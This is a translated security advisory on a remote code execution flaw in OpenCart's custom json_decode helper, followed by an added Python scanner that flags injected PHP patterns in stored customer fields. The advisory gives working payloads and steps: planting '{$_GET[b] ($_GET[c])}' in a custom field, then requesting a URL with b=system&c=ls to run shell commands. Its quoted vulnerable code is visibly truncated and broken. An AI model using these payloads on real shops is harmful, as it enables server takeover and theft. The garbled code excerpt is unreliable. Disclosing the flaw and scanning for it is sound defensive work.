2016-04-12 14:12:56 Source: 360 Security Broadcast, author: Dark Feather Meow, views: 103
Recently, security researcher Naser Farhadi (Twitter: @naserfarhadi) found a remote PHP code execution vulnerability in OpenCart's json_decode function, affecting versions 2.1.0.2 through 2.2.0.0 (the latest version).
The vulnerability is in /upload/system/helper/json.php, where the code reads:

```php
# /upload/system/helper/json.php
$match = '/'. *? (?
```

This helper builds its result by turning the JSON text into PHP code, which is why the json_decode function it defines can be exploited.
Here are a few simple test cases:

```php
var_dump(json_decode('{"OK": "1"."2"."3"}'));
var_dump(json_decode('{"OK": "$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"OK": "{$_GET[b] ($_GET[c])}"}'));
```
In a real-world scenario it can be exploited through /index.php?route=account/edit.
For example, enter $_SERVER[HTTP_USER_AGENT] as the name and save (this needs to be repeated twice).
Then, when the administrator opens the admin panel, the Recent Activity section will show the administrator's own User-Agent in the place where your name should appear.
Another example is the custom_field in account/edit or account/register, which is probably the most suitable place.
If the administrator has added a custom field under /admin/index.php?route=customer/custom_field to collect extra information such as a phone number,
you can inject your code directly into that custom_field.
For example, enter {$_GET[b] ($_GET[c])} in the custom_field and save it.
Then visit
http://host/shop_directory/index.php?route=account/edit&b=system&c=ls
and you will see that the code is executed.
Note that this only works when the PHP JSON extension is not installed, since only then is the helper's own json_decode used in place of the native one.
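As an added defensive example (not part of the advisory or of OpenCart), the following Python scans stored customer fields for the PHP interpolation and concatenation patterns the test cases above rely on, so that a site that cannot immediately install the JSON extension can flag suspicious name and custom_field values; the record layout and sample rows are constructed assumptions.

```python
import re
from typing import List

# Patterns drawn from the advisory's test cases: superglobal interpolation
# ($_SERVER[...], $_GET[...]), brace-wrapped expressions ({$...}) and string
# concatenation ("1"."2") inside what should be a plain JSON string value.
PATTERNS = {
    "superglobal_interpolation": re.compile(
        r"\$_(?:get|post|server|request|cookie)\s*\[", re.IGNORECASE
    ),
    "brace_expression": re.compile(r"\{\s*\$"),
    "string_concat": re.compile(r'"\s*\.\s*"'),
}


def find_php_injection(value: str) -> List[str]:
    """Return the names of all patterns that match a single stored field value."""
    return [name for name, pat in PATTERNS.items() if pat.search(value)]


def scan_records(records):
    """records: iterable of (record_id, field_name, value) tuples (assumed layout).

    Returns one finding per record whose value matches at least one pattern.
    """
    findings = []
    for rec_id, field, value in records:
        hits = find_php_injection(value)
        if hits:
            findings.append({"id": rec_id, "field": field, "patterns": hits})
    return findings


# Constructed sample rows, not data from any real shop.
SAMPLE_RECORDS = [
    (1, "firstname", "Alice"),
    (2, "firstname", "$_SERVER[HTTP_USER_AGENT]"),
    (3, "custom_field", "{$_GET[b] ($_GET[c])}"),
    (4, "custom_field", '1"."2"."3'),
    (5, "telephone", "+1 555 0100"),
]

if __name__ == "__main__":
    for finding in scan_records(SAMPLE_RECORDS):
        print(finding)
```

Any hit should be treated as a sign that the helper may already have been abused, not merely as bad input, so review the admin activity log and the affected customer record together.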
This article was translated by 360 Security Broadcast; when reprinting, please state "Reprinted from 360 Security Broadcast" and include the link.
Original link: http://seclists.org/bugtraq/2016/Apr/61